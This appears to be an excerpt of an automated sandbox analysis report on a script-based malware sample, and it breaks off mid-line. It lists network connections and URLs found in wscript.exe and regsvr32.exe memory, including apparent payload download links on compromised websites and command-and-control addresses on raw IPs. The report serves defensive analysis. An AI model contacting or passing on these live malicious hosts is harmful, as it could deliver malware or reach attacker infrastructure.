                Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
                Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
                Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
                Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
                Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
                Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
                Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
                Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
                Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
                Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
                Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
                Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
                Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
                Source: wscript.exe, 00000001.00000003.400714303.0000000005290000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399676570.0000000005290000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402484207.0000000005290000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.388435082.0000000005290000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.404747809.0000000005290000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.504544238.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632856837.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.480984272.0000000000F11000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.478729918.0000000000F77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: regsvr32.exe, 00000004.00000003.478028877.0000000000F73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
                Source: regsvr32.exe, 00000004.00000003.532536452.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.504424434.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.481129243.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632757041.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.480385040.0000000000EDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                Source: regsvr32.exe, 00000004.00000003.504544238.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632695477.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.480984272.0000000000F11000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.4.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                Source: regsvr32.exe, 00000004.00000003.480984272.0000000000F11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?7e9e8fd5542da
                Source: regsvr32.exe, 00000004.00000003.504544238.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632856837.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.480984272.0000000000F11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabf
                Source: wscript.exe, wscript.exe, 00000001.00000003.400975986.00000000050A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393015546.0000000004E75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391243728.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400442984.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393338930.0000000004F2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.389673228.0000000004FEB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391819816.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394911230.0000000004EFC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395679692.0000000005098000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391578273.0000000004DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397422958.0000000005117000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393251132.0000000004EEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393397688.0000000004EAE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402722979.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394406630.0000000005020000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402919914.00000000050A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391819816.0000000004D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.390466221.0000000004D07000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394296521.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.390572551.0000000004D33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ozmeydan.com/cekici/9/
                Source: wscript.exe, 00000001.00000003.400124856.0000000001231000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ozmeydan.com/cekici/9/xM
                Source: wscript.exe, wscript.exe, 00000001.00000003.400975986.00000000050A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393015546.0000000004E75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391243728.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400442984.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393338930.0000000004F2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.389673228.0000000004FEB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391819816.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394911230.0000000004EFC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395679692.0000000005098000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391578273.0000000004DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397422958.0000000005117000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393251132.0000000004EEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393397688.0000000004EAE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402722979.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394406630.0000000005020000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402919914.00000000050A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391819816.0000000004D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.390466221.0000000004D07000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394296521.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.390572551.0000000004D33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://softwareulike.com/cWIYxWMPkK/
                Source: wscript.exe, 00000001.00000003.400124856.0000000001231000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://softwareulike.com/cWIYxWMPkK/yM
                Source: wscript.exe, wscript.exe, 00000001.00000003.400975986.00000000050A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393015546.0000000004E75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391243728.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400442984.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393338930.0000000004F2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.389673228.0000000004FEB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391819816.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394911230.0000000004EFC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395679692.0000000005098000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391578273.0000000004DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397422958.0000000005117000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393251132.0000000004EEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393397688.0000000004EAE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402722979.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394406630.0000000005020000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402919914.00000000050A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391819816.0000000004D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.390466221.0000000004D07000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394296521.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.390572551.0000000004D33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/
                Source: wscript.exe, 00000001.00000003.400124856.000000000122C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/0
                Source: wscript.exe, 00000001.00000003.400124856.0000000001231000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/zM
                Source: regsvr32.exe, 00000004.00000002.632856837.0000000000F1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://104.168.155.143:8080/(SI
                Source: regsvr32.exe, 00000004.00000002.632856837.0000000000F1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://104.168.155.143:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/
                Source: regsvr32.exe, 00000004.00000002.632856837.0000000000F1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://104.168.155.143:8080/l
                Source: regsvr32.exe, 00000004.00000002.632856837.0000000000F1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://159.89.202.34/
                Source: regsvr32.exe, 00000004.00000002.632856837.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.633026699.000000000306E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://159.89.202.34/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/
                Source: regsvr32.exe, 00000004.00000002.632856837.0000000000F73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://159.89.202.34/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/11
                Source: regsvr32.exe, 00000004.00000002.632856837.0000000000F1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://159.89.202.34/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/X&
                Source: regsvr32.exe, 00000004.00000002.632856837.0000000000F1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://159.89.202.34/q
                Source: regsvr32.exe, 00000004.00000002.632856837.0000000000F1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://159.89.202.34/wn
                Source: regsvr32.exe, 00000004.00000002.633026699.000000000307F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://159.89.202.34:443/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/
                Source: regsvr32.exe, 00000004.00000002.632757041.0000000000ED7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.142.56:8080/
                Source: regsvr32.exe, 00000004.00000002.633026699.000000000307F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.633026699.000000000306E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632757041.0000000000EDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.142.56:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/
                Source: regsvr32.exe, 00000004.00000002.632757041.0000000000EDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.142.56:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/;
                Source: regsvr32.exe, 00000004.00000002.633026699.000000000306E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.142.56:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/b
                Source: regsvr32.exe, 00000004.00000002.632856837.0000000000F1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.142.56:8080/u
                Source: regsvr32.exe, 00000004.00000002.632856837.0000000000F1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://163.44.196.120:8080/
                Source: regsvr32.exe, 00000004.00000002.632856837.0000000000F1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://163.44.196.120:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/
                Source: regsvr32.exe, 00000004.00000002.632856837.0000000000F1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://164.90.222.65/0
                Source: regsvr32.exe, 00000004.00000002.633026699.000000000306E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://164.90.222.65/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/
                Source: regsvr32.exe, 00000004.00000002.633026699.000000000307F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://164.90.222.65:443/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/?
                Source: regsvr32.exe, 00000004.00000002.632856837.0000000000F1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://167.172.199.165:8080/
                Source: regsvr32.exe, 00000004.00000002.633026699.000000000307F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.532419572.000000000307F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://167.172.199.165:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/
                Source: regsvr32.exe, 00000004.00000002.632757041.0000000000EDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://169.89.202.34/
                Source: regsvr32.exe, 00000004.00000003.504544238.0000000000F1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://182.162.143.56/
                Source: regsvr32.exe, 00000004.00000003.504544238.0000000000F1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://182.162.143.56/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/
                Source: regsvr32.exe, 00000004.00000003.532419572.000000000306E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://182.162.143.56/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/D=
                Source: regsvr32.exe, 00000004.00000003.532419572.000000000306E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://182.162.143.56/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/Z=
                Source: regsvr32.exe, 00000004.00000003.532536452.0000000000EDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://187.172.199.165:8080/
                Source: regsvr32.exe, 00000004.00000003.532536452.0000000000EDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://187.63.160.88:80/
                Source: regsvr32.exe, 00000004.00000003.532536452.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.532419572.000000000307F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.633026699.000000000306E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.532419572.000000000306E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://187.63.160.88:80/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/
                Source: regsvr32.exe, 00000004.00000003.504544238.0000000000F1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://66.228.32.31:7080/Q
                Source: regsvr32.exe, 00000004.00000003.532419572.000000000306E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://66.228.32.31:7080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/
                Source: regsvr32.exe, 00000004.00000002.632695477.0000000000EAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.121.146.47:8080/
                Source: regsvr32.exe, 00000004.00000002.632695477.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.480984272.0000000000F00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.121.146.47:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/
                Source: regsvr32.exe, 00000004.00000002.632695477.0000000000E8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.121.146.47:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/0
                Source: regsvr32.exe, 00000004.00000003.504424434.0000000000EDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://912.162.143.56/
                Source: wscript.exe, 00000001.00000002.404406526.0000000005194000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6H
                Source: wscript.exe, wscript.exe, 00000001.00000003.400975986.00000000050A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393015546.0000000004E75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391243728.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400442984.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393338930.0000000004F2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.389673228.0000000004FEB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391819816.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394911230.0000000004EFC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395679692.0000000005098000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391578273.0000000004DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397422958.0000000005117000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393251132.0000000004EEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393397688.0000000004EAE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402722979.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394406630.0000000005020000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402919914.00000000050A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391819816.0000000004D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.390466221.0000000004D07000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394296521.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.390572551.0000000004D33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/
                Source: wscript.exe, 00000001.00000003.389673228.0000000004FEB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398560196.0000000004FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/.dllB
                Source: wscript.exe, 00000001.00000003.400124856.0000000001231000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uM
                Source: wscript.exe, 00000001.00000003.400714303.0000000005290000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399676570.0000000005290000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402484207.0000000005290000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.388435082.0000000005290000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.404747809.0000000005290000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://penshorn.org/
                Source: wscript.exe, wscript.exe, 00000001.00000003.400975986.00000000050A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393015546.0000000004E75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391243728.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400442984.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393338930.0000000004F2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.389673228.0000000004FEB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391819816.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394911230.0000000004EFC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395679692.0000000005098000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391578273.0000000004DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397422958.0000000005117000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393251132.0000000004EEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393397688.0000000004EAE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402722979.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394406630.0000000005020000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402919914.00000000050A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391819816.0000000004D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.390466221.0000000004D07000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394296521.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.390572551.0000000004D33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/
                Source: wscript.exe, 00000001.00000003.391578273.0000000004DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.392115662.0000000004DEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391750338.0000000004DE7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402096163.0000000004DEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.404247402.0000000004DEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/R
                Source: wscript.exe, 00000001.00000003.398804343.0000000005194000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.404417697.000000000519E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399230636.0000000005194000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399258764.0000000005196000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.389687687.0000000005193000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/cw3
                Source: wscript.exe, 00000001.00000003.400124856.0000000001231000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/tM
                Source: wscript.exe, 00000001.00000003.400442984.0000000005266000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.388435082.0000000005266000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402255447.0000000005266000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.404632194.0000000005266000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399676570.0000000005266000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://penshorn.org/v
                Source: wscript.exe, 00000001.00000002.404454942.00000000051DC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399363691.00000000051DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://penshorn.org:443/admin/Ses8712iGR8du/
                Source: wscript.exe, wscript.exe, 00000001.00000003.400975986.00000000050A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393015546.0000000004E75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391243728.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400442984.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393338930.0000000004F2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.389673228.0000000004FEB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391819816.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394911230.0000000004EFC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395679692.0000000005098000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391578273.0000000004DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397422958.0000000005117000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393251132.0000000004EEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393397688.0000000004EAE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402722979.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394406630.0000000005020000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402919914.00000000050A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391819816.0000000004D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.390466221.0000000004D07000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394296521.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.390572551.0000000004D33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/
                Source: wscript.exe, 00000001.00000003.400124856.0000000001231000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wM
                Source: wscript.exe, wscript.exe, 00000001.00000003.400975986.00000000050A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393015546.0000000004E75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391243728.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400442984.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393338930.0000000004F2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.389673228.0000000004FEB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391819816.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394911230.0000000004EFC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395679692.0000000005098000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391578273.0000000004DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397422958.0000000005117000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393251132.0000000004EEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393397688.0000000004EAE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402722979.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394406630.0000000005020000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402919914.00000000050A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391819816.0000000004D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.390466221.0000000004D07000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 